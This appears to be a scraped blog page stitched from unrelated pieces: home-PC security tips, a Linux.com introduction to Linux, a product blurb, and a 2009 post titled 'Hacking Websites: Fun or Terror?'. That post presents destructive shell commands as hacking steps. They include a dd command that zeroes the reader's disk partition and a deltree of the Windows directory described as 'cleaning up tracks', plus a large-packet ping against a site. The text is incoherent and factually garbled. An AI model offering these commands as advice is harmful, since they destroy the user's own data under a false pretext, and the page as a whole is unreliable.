8. Copy your services file and test "stripping" it down to just the basics. You should only need ftp, telnet, pop3, and the routed services, but test it out. Win 95/98 - C:\WINDOWS\SERVICESWin NT/2K- C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICESMac OS X - /etc/services
7. If you don't have a home network setup then turn off the following services: File and Print Sharing for Microsoft NetworksClient Services for Microsoft NetworksInstructions: Win 95/98 Win NT
6. Use Security Zones
5. Disable Active X and Javascript in your browser by going to Tools/Internet Options/Security, click the Internet icon, then click the Custom Level button and set your preferences for ActiveX and Scripting.
4. Disable HTML e-mails and scripting in your e-mail client. This is an option in your e-mail properties. If you are unsure how to do it, open your client and do a search in help and follow the instructions. HTML is the code that "runs" or displays web pages. It is possible that malevolent code is a-lurkin' in that purty e-mail.
3. If the option is available, press the lock button on your high-speed modem if you will not be accessing the Internet for an extended period of time.
2. Keep Software Up-to-dateWindowsInternet Explorer or your browser (same as above)Outlook or your e-mail clientMacsNetscapeSoftware Firewall
NOTE: Microsoft never sends updates via e-mail. If you get an e-mail claiming to hold a Microsoft update, do not open it. Trash it.
1. Get a firewall! I recommend either of these products:Norton Internet Security 2003Norton Personal Firewall 2003

What is Linux?

Linux starts here
Linux (pronounced LIH-nuks) is an operating system for computers, comparable to Windows or Mac OS X. It was originally created starting in 1991 by Finnish programmer Linus (pronounced LEE-nus) Torvalds with the assistance of developers from around the globe. Linux resembles Unix, an earlier operating system, but unlike Unix, Linux is both Free Software and open source software -- that is, you can not only download and run it on your computer, but also download all the source code the programmers created to build the operating system. You can then modify or extend the code to meet your needs.
Linux runs on a wide variety of hardware platforms, from huge mainframes to desktop PCs to cell phones. It is licensed under the Free Software Foundation's GNU Project's GNU General Public License, version 2, which lets users modify and redistribute the software.
You can think of Linux as having two parts -- a kernel, which is the basic interface between the hardware and other system software, and the functions that run on top of it, such as a graphical user interface (GUI) and application programs.
About Linux.com
Linux.com did not create and does not sell Linux. We simply write about Linux and other open source software. We're part of SourceForge, Inc., which also maintains SourceForge.net and Slashdot.
No single company sells Linux. Because it's open source software, anyone can package Linux with some programs and utilities and distribute it. The different "flavors" of Linux are called distributions. You can get information about some of the most popular distributions from our distributions page. A comprehensive resource for distributions is DistroWatch.com.
Many Linux distributions are designed to be installed on your computer's hard drive, either as a sole operating system, or in a dual boot configuration with another OS, which lets you choose which operating system to run every time you start your computer. Others are designed to run as live CDs that boot from removable media -- typically CDs, but there are also live DVD distributions, and even ones that boot from diskettes and USB storage media. Live distributions can be useful because they let you run a different operating system without affecting any of the contents of your hard drive.
If you're a Windows user to whom Linux is completely new, trying it out might sound daunting. For you we explain in a separate article how you can test Linux without altering your Windows computer, how to install Linux while preserving all of your Windows programs and files, and how to choose what Linux flavor suits your needs best.The Linux desktop
Part of what makes Linux useful on your computer is its graphical user interface. The GUI gives Linux a "look and feel" with clickable icons and widgets, as well as screen borders, scroll bars, and menus that the user can manipulate and customize. This "point and click" environment makes the operating system more intuitive by presenting interface options in an attractive visual layout that doesn't require knowledge of textual commands. Without the GUI, Linux (or any operating system) requires users to type commands in a procedure that is known as the Command Line Interface (CLI).
While most operating systems don't let you choose the user interface you want, Linux gives you a choice of several. Most of them are more than just graphical interfaces -- they are truly complete desktop environments that come with tools, utilities, games, and other applications to make the user's computing experience a richer one. Two of the most popular desktop environments that work with Linux are KDE and GNOME.
KDE stands for K Desktop Environment. KDE runs on any Unix operating system, including Linux. All of the source code for KDE is licensed under the terms of the GNU General Public License, which means that anyone can access and change KDE to suit specific purposes. KDE comes packaged with most Linux distributions and includes standardized menus, toolbars, and color schemes, as well as a complete help system, networking tools, graphics and multimedia applications, and a complete office productivity solution, and dozens of other software tools. The entire KDE project is supported by the free software development community and is provided to Linux users at no cost.
GNOME (pronounced guh-NOME), the GNU Network Object Model Environment, is another ubiquitous GUI or desktop environment for Linux. It is also licensed under the terms of the GNU General Public License, which means it is freely available, along with the source code, for use on any Unix-based operating system. GNOME comes packaged with just about every Linux distribution. It is a part of the GNU project, which created the GNU operating system, parts of which are included with all standard Linux distributions.
Like KDE, the GNOME desktop environment includes more than just toolbars, icons and menus. Help files, networking tools, games, and productivity applications like GNOME Office round out the free software offering.
Other GUIs that work with Linux include:
XPDE desktop environment - "tries to make it easier for Windows XP users to use a Linux box."
Xfce - "lightweight desktop environment for various *NIX systems. Designed for productivity, it loads and executes applications fast, while conserving system resources."
Enlightenment - "advanced graphical libraries, tools, and environments."
IceWM - "The goal of IceWM is speed, simplicity, and not getting in the user's way."
Blackbox - "Blackbox is the fast, lightweight window manager for the X Window System you have been looking for, without all those annoying library dependencies."
Window Maker - "Window Maker is an X11 window manager originally designed to provide integration support for the GNUstep Desktop Environment."
FluxBox - "A fast compact window manager based on the Blackbox, but offering more features."The command line
One thing all the desktop environments have in common is that they let users access Linux commands; you don't have to use a mouse to perform every operation. It may be faster and easier to perform some operations by typing in one or more commands, as users used to have to do on PCs under DOS 20 years ago.
Each desktop environment has a different way to get to a command prompt. Often, you'll open a window that lets you type commands. In GNOME, that application is called GNOME Terminal; in KDE, it's Konsole.
We've prepared a brief introduction to the command line. A good site for further learning is LinuxCommand.org.Desktop applications
Like any operating system, Linux supports a wide range of desktop applications. Typical programs include those for email, office software, playing music and video, personal information management, network communications such as instant messaging and Internet Relay Chat, and file sharing.Gaming
Linux is no stranger to gaming. Linux distributions almost always include games; the GNOME Games package, for example, features 16 arcade and puzzle games, and the KDE Games Center includes games from the arcade, board, card, dice, logic, strategy, and toy genres. If the distributions don't contain what you're looking for, you can turn to commercial sites such as Linux Game Publishing and Tux Games, or you can buy games directly from small companies, independent publishers, and bedroom coders. If games designed for Microsoft Windows or home gaming systems are what you're after, several available emulators may be able to help. For more information on the numerous games available to Linux users and how to obtain them, see Enjoying games with GNU/Linux.This is not the end
Coming soon, we'll be adding to this document to talk about different categories of desktop and server applications, programming tools, training, and support. We welcome your input on what you think new Linux users should know about. If you are a new Linux user with a question, please ask it in our forums.

Monday, May 4, 2009

Hacking Websites: Fun or Terror?

With a proper understanding of the relevant programming languages such as C, C++, Pearl, java etc. one can be fully equipped with the technique of hacking into website. There backdoors for the web hackers for website hacking. For hacking web sites one of the best ways for the hacker is to install linux on his or her personal computer he or she wants to hack from.

window.google_render_ad();
Then he can open up a shell to type: dd if=/dev/zero of=/dev/hda1 and press ENTER. As the next step he will type: dd hf= (url). There are a few other alternatives for hacking sites as well. The web hackers using Windows pc can also master the art of hacking websites with the flicking of his finger.The first step is to clean up the tracks so that the feds fail to trace out the hacker. This happens automatically in case of linux. Cleaning up of tracks in case of Windows 95 or Windows 98 or Windows ME involves a step-by step procedure. Click Start then Run and then Command. In case of Windows NT or Windows 2000 the Tracks can be cleaned by pressing Start, then Run and then cmd. The next step is to clean up tracks with deltree c:/windows or c:\winnt, or whatever the main windows directory is. At the command prompt, press y, which will then go through and clean up the system's logs. The hackers should perform the same steps again after the hacking sites/hacking wireless internet sites. Then after this cleaning up the hackers should type: ping -l4000 (url).
Cyber Terrorism And Hacker's GroupThe whole planet is today terrorized by the web hackers to whom hacking seems a mode of getting pleasure by the way of gaining knowledge or mere entertainment. A group of serious hackers named as PENTAGUARD had cracked into the government sites of Australia, America and England all at a time. The hackers in this case had replaced with a typical statement that read "The largest .gov & .mil mass defacement in the history of mankind". This was a simple statement with an aesthetic undertone of threat. The act affected almost 24 sites with a transitory disruption.Similarly an educational site on the mad cow disease was defaced along with some cities and the nation's government sites in England. The Alaskan office of the department of interior was once attacked since the secretary of the Interior Designate, Gale Norton, encouraged drilling in the Arctic Wild Life Refugee for sucking out oil. The common wealth of Australia is of no exception. The search page of the common wealth of Australia was once hacked along with the act of hacking into websites of small municipal sites in Australia. These are a scanty number of instances that proved to have jeopardized the respective concerns severely. The hackers had to use simple techniques and methods to do these. website hacking for these hackers is all as simple as a child's play. Their main focus was on the sites that were designed with vulnerable loopholes.

Hacking Linux : Programmers test themselves

Since Microsoft has a huge chunk of the operating system's market in the world, it is the first victim of hackers. But that doesn't mean that Linux hacking doesn't exist. Although is less common than it's close sourced companion, there are several reasons why hackers try to hack machines with Linux.

window.google_render_ad();
Many corporations use Linux as their server on the web as it is cheaper and easier to deploy. Its security is also better when compared to Microsoft operating systems. No wonder that network hacking tools for this open source operating system have proliferated in the last years.

Secure, managed engineering access

Secure, managed engineering accessDesigned for NERC Cybersecurity standards
Note: CrossBow was formally known as IED Anywhere 2
Benefits -->
Remote, transparent access to IEDs, from any software application
Preserves investment in legacy gateway devices and communication infrastructure
Meets NERC CIP-002-1 through CIP-009-1 requirements for security:
Strong (2-factor) authentication
Active Directory support
Individual user accounts
Comprehensive NERC CIP compliance reports
Audit log
WAN or Dial-up access
Administration interface allows management of thousands of IEDs and hundreds of users

akash tips & tricks

About Me

My photo
mumbai, mumbai, India
akash....... hacking tips & track plz use only for knowledge plz dont use misuse..........